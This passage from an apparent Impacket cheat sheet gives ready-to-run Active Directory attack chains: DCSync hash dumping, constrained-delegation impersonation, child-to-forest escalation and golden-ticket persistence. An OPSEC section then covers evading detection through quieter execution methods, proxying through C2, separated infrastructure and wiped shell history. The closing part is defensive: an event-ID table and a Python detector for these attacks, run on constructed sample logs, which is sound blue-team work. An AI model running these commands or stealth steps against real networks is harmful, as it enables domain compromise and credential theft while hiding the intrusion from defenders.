impacket-secretsdump DOMAIN/admin@DC_IP -hashes :NTLM   # DCSync
Chain 4 — Constrained Delegation Abuse
findDelegation -> getST S4U2Proxy -> use ticket -> target service
impacket-findDelegation DOMAIN/user:Pass -dc-ip DC_IP
impacket-getTGT DOMAIN/svcaccount:Pass
impacket-getST DOMAIN/svcaccount:Pass \
  -spn cifs/fileserver.domain.local \
  -impersonate Administrator -dc-ip DC_IP
export KRB5CCNAME=Administrator.ccache   # use the filename getST prints
impacket-smbclient DOMAIN/Administrator@fileserver.domain.local -k -no-pass
Chain 5 — Child Domain → Forest DA
Own child domain DA -> get child krbtgt + SID -> raiseChild.py -> forest root DA
impacket-secretsdump child.domain.local/admin:Pass@childDC -just-dc-user krbtgt
impacket-raiseChild -target-exec PARENT_DC_IP \
  child.domain.local/admin:Pass
Chain 6 — Golden Ticket Persistence
DCSync krbtgt -> ticketer.py -> export ccache -> persistent DA
impacket-secretsdump DOMAIN/admin:Pass@DC_IP -just-dc-user krbtgt
impacket-lookupsid DOMAIN/admin:Pass@DC_IP   # get the domain SID
impacket-ticketer -nthash KRBTGT -domain-sid S-1-5-21-... \
  -domain DOMAIN.LOCAL Administrator
export KRB5CCNAME=Administrator.ccache
impacket-psexec DOMAIN/Administrator@DC_IP -k -no-pass
OPSEC — Maintaining Stealth with Impacket
🔇 Noise Reduction — Core Principles
Execution Choice: psexec and smbexec are heavily signatured (service install, Event 7045). Prefer dcomexec or wmiexec, then atexec. Both dcomexec and wmiexec still write command output to ADMIN$ unless you add -nooutput (or -silentcommand for wmiexec), and every method that wraps commands in cmd.exe produces a 4688 with an unusual parent (WmiPrvSE.exe for WMI, mmc.exe or explorer.exe for DCOM).
# AVOID (noisy, drops file, creates service):
impacket-psexec DOMAIN/admin:Pass@TARGET
# PREFER (WMI, no service; -nooutput avoids the ADMIN$ write):
impacket-wmiexec DOMAIN/admin:Pass@TARGET -nooutput "cmd /c ..."
# ALSO (DCOM, no service; add -nooutput for the same reason):
impacket-dcomexec DOMAIN/admin:Pass@TARGET -nooutput "cmd /c ..."
DCSync IOC: Event 4662 carrying the DS-Replication-Get-Changes-All GUID from a non-DC account is a high-fidelity alert, and -just-dc-user does not change that; it only shrinks the number of 4662s. The VSS method trades the drsuapi alert for host-level ones: remote service or WMI execution on the DC, shadow copy creation, and NTDS.dit copied out over SMB.
# Fewer replication events than a full NTDS dump (still 4662 on the DC):
impacket-secretsdump DOMAIN/admin:Pass@DC_IP -just-dc-user krbtgt
impacket-secretsdump DOMAIN/admin:Pass@DC_IP -just-dc-user Administrator
# VSS method (shadow copy): no drsuapi, but commands run on the DC itself:
impacket-secretsdump DOMAIN/admin:Pass@DC_IP -use-vss -exec-method wmiexec
Kerberoast IOC: GetUserSPNs requests RC4 (etype 0x17) tickets first, and an RC4 TGS for an account that has AES keys (msDS-SupportedEncryptionTypes) is the classic encryption-downgrade alert in modern AD. GetUserSPNs has no flag to force AES. Limit the blast radius with -request-user; -k changes how you authenticate to LDAP and the KDC, not the etype of the roasted ticket.
# Default requests RC4 (etype 23): downgrade IOC on AES-enabled accounts
impacket-GetUserSPNs DOMAIN/user:Pass -dc-ip DC_IP -request-user svc_sql
# Kerberos auth (-k) for the tool's own session; the ticket etype is unchanged
impacket-GetUserSPNs DOMAIN/user -k -no-pass -dc-ip DC_IP -request-user svc_sql
Silver > Golden: a silver ticket goes straight to the service and never touches the DC; a golden ticket is forged offline but is used for TGS-REQs against the DC, where a TGS with no preceding AS-REQ, unusual lifetimes, or mismatched SIDs can be spotted. Prefer silver tickets for specific lateral movement.
🌐 Infrastructure OPSEC
Proxychains: Route all Impacket traffic through SOCKS5 proxy obtained via ntlmrelayx or C2. Never run from C2 server IP directly.
proxychains impacket-secretsdump DOMAIN/admin:Pass@TARGET
proxychains impacket-wmiexec DOMAIN/admin:Pass@TARGET
Separate Infrastructure: Run scans from different IPs than relays, which differ from command execution. Detection of one IP must not collapse entire operation.
🪵 Evidence & Cleanup
Clean Up After Yourself: Remove created accounts, services, WMI subscriptions, and scheduled tasks immediately after use.
# Remove the machine account you created:
impacket-addcomputer DOMAIN/user:Pass -dc-ip DC_IP \
  -computer-name 'attacker$' -delete
# Remove WMI persistence:
impacket-wmipersist DOMAIN/admin:Pass@TARGET remove -name PersistName
# Disable xp_cmdshell after MSSQL operations (inside mssqlclient):
disable_xp_cmdshell
⚙ Key OPSEC Pre-Flight
1. Check signing: verify SMB signing is not required before relaying (nxc smb --gen-relay-list)
2. Time sync with the DC before any Kerberos operation (KRB_AP_ERR_SKEW otherwise): sudo ntpdate DC_IP
3. Prefer -k -no-pass (ccache) over plaintext passwords on the command line
4. Use -outputfile to save results to disk rather than scrolling them through the terminal
5. -just-dc-user for secretsdump rather than a full dump when possible
6. Set HISTFILE=/dev/null before running any impacket command with creds in its arguments; clear afterwards with history -c
7. Record everything you create (machine accounts, services, tasks, WMI subscriptions) so cleanup is complete
Common Flag Reference
Flag                Description
-hashes LM:NT       NTLM hash auth (use :NT for NT only)
-k                  Kerberos auth (ticket taken from KRB5CCNAME)
-no-pass            Skip password prompt (use with -k)
-aesKey HEX         AES256/AES128 key for Kerberos
-dc-ip IP           Specify DC IP directly
-target-ip IP       Override target IP (hostname resolution)
-debug              Turn on debug output
-ts                 Add timestamps to all logging
-outputfile F       Save results to file
-just-dc            Only dump NTDS data (secretsdump)
-just-dc-user U     Dump a single user only (secretsdump)
-use-vss            VSS method for NTDS dump (secretsdump)
-nooutput           No output retrieval (wmiexec, dcomexec)
-silentcommand      Run the command without a cmd.exe wrapper, no output (wmiexec)
Windows Event IDs Generated by Impacket (Blue Team Awareness)
Event ID   Tool/Action                    Description
4624       All tools                      Successful logon (Type 3 = network)
4625       All tools                      Failed logon attempt
4648       Windows-side only              Logon with explicit credentials; not produced by Impacket run from Linux
4662       secretsdump DCSync             Object operation with replication GUIDs from a non-DC account. HIGH ALERT
4663       secretsdump VSS                Object access (NTDS.dit, registry hives) where SACLs are set
4688       wmiexec/smbexec/dcomexec       Process creation (cmd.exe under WmiPrvSE.exe, services.exe, mmc.exe/explorer.exe)
4698       atexec                         Scheduled task created
4699       atexec                         Scheduled task deleted
4768       GetNPUsers                     Kerberos AS-REQ with Pre-Authentication Type 0 (ASREPRoasting)
4769       GetUserSPNs, golden ticket     Kerberos TGS-REQ (Kerberoasting: RC4 etype 0x17; golden ticket: TGS with no prior 4768)
7045       psexec/smbexec/services.py, secretsdump -use-vss (smbexec exec-method)   Service installed. IMMEDIATE ALERT
4776       All NTLM tools                 NTLM authentication attempt
5136       rbcd/addcomputer/ACL changes   Directory object modified (msDS-AllowedToActOnBehalfOfOtherIdentity, new computer object) when directory change auditing is on
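To make the table actionable on the blue side, the following Python is an added example (not from the page or any vendor product) that runs the patterns above over a handful of constructed events: RC4 TGS requests fanning out across SPNs (Kerberoasting), AS-REQs with pre-auth type 0, 4662 replication-GUID access from a non-DC account, the smbexec %COMSPEC% service image, a psexec-style random service name (marked heuristic), and cmd.exe under WmiPrvSE.exe writing to ADMIN$. The event dicts are modelled on the log fields and are not real log data; the threshold constant is an assumption to tune.

```python
import re
from collections import defaultdict

# Control-access GUIDs that appear in the Properties field of a DCSync 4662
DCSYNC_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
KERBEROAST_MIN_SPNS = 3   # assumed threshold: distinct SPNs requested with RC4 by one source

# Constructed events modelled on Security/System log fields (not real log data).
EVENTS = [
    {"id": 4769, "ip": "10.0.0.50", "user": "jdoe@CORP.LOCAL", "service": "svc_sql", "etype": "0x17"},
    {"id": 4769, "ip": "10.0.0.50", "user": "jdoe@CORP.LOCAL", "service": "svc_web", "etype": "0x17"},
    {"id": 4769, "ip": "10.0.0.50", "user": "jdoe@CORP.LOCAL", "service": "svc_backup", "etype": "0x17"},
    {"id": 4769, "ip": "10.0.0.7", "user": "alice@CORP.LOCAL", "service": "FS01$", "etype": "0x12"},
    {"id": 4768, "ip": "10.0.0.50", "user": "bob", "preauth": "0", "etype": "0x17"},
    {"id": 4768, "ip": "10.0.0.7", "user": "alice", "preauth": "2", "etype": "0x12"},
    {"id": 4662, "user": "jdoe", "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 4662, "user": "DC02$", "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 7045, "service": "BTOBTO",
     "image": "%COMSPEC% /Q /c echo whoami ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 > %TEMP%\\execute.bat & "
              "%COMSPEC% /Q /c %TEMP%\\execute.bat & del %TEMP%\\execute.bat"},
    {"id": 7045, "service": "QeLd", "image": "%SystemRoot%\\oFjTwhUN.exe"},
    {"id": 7045, "service": "Spooler", "image": "C:\\Windows\\System32\\spoolsv.exe"},
    {"id": 4688, "parent": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "cmdline": "cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1700000000.12 2>&1"},
]


def detect_kerberoast(events):
    """RC4 (0x17) TGS requests for user-account SPNs; alert per source once it spans several SPNs."""
    spns = defaultdict(set)
    for e in events:
        if e["id"] == 4769 and e["etype"] == "0x17" and not e["service"].endswith("$"):
            spns[e["ip"]].add(e["service"])
    return sorted(ip for ip, s in spns.items() if len(s) >= KERBEROAST_MIN_SPNS)


def detect_asreproast(events):
    """AS-REQ with Pre-Authentication Type 0: the account has pre-auth disabled and was roasted."""
    return sorted(e["user"] for e in events if e["id"] == 4768 and e["preauth"] == "0")


def detect_dcsync(events):
    """4662 carrying replication GUIDs from anything that is not a computer account (a DC)."""
    hits = []
    for e in events:
        if e["id"] != 4662 or e["user"].endswith("$"):
            continue
        if any(g in e["properties"].lower() for g in DCSYNC_GUIDS):
            hits.append(e["user"])
    return sorted(hits)


def detect_service_exec(events):
    """7045 patterns: smbexec's %COMSPEC% wrapper writing __output (certain) and a psexec-style
    four-letter service name whose image is a random EXE in %SystemRoot% (heuristic)."""
    hits = []
    for e in events:
        if e["id"] != 7045:
            continue
        img = e["image"]
        if "%COMSPEC% /Q /c" in img and "__output" in img:
            hits.append(("smbexec", e["service"]))
        elif re.fullmatch(r"[A-Za-z]{4}", e["service"]) and re.fullmatch(r"(?i)%systemroot%\\[a-z]{8}\.exe", img):
            hits.append(("psexec-like", e["service"]))
    return hits


def detect_wmiexec(events):
    """cmd.exe spawned by WmiPrvSE.exe redirecting output into ADMIN$\\__<timestamp>."""
    return [e["cmdline"] for e in events
            if e["id"] == 4688 and e["parent"].lower().endswith("wmiprvse.exe")
            and "\\\\127.0.0.1\\ADMIN$\\__" in e["cmdline"]]


def detect_all(events):
    return {
        "kerberoast": detect_kerberoast(events),
        "asreproast": detect_asreproast(events),
        "dcsync": detect_dcsync(events),
        "service_exec": detect_service_exec(events),
        "wmiexec": detect_wmiexec(events),
    }


if __name__ == "__main__":
    for rule, hits in detect_all(EVENTS).items():
        print(f"{rule}: {hits}")
```

The DC02$ 4662 in the sample is the reason the DCSync rule filters on the account suffix: DCs replicate from each other constantly with the same GUIDs, so the alert has to key on the requester, not the right. The other detections are only as good as the auditing behind them (Kerberos service ticket operations and process creation with command line must be enabled for 4769/4688 to carry these fields).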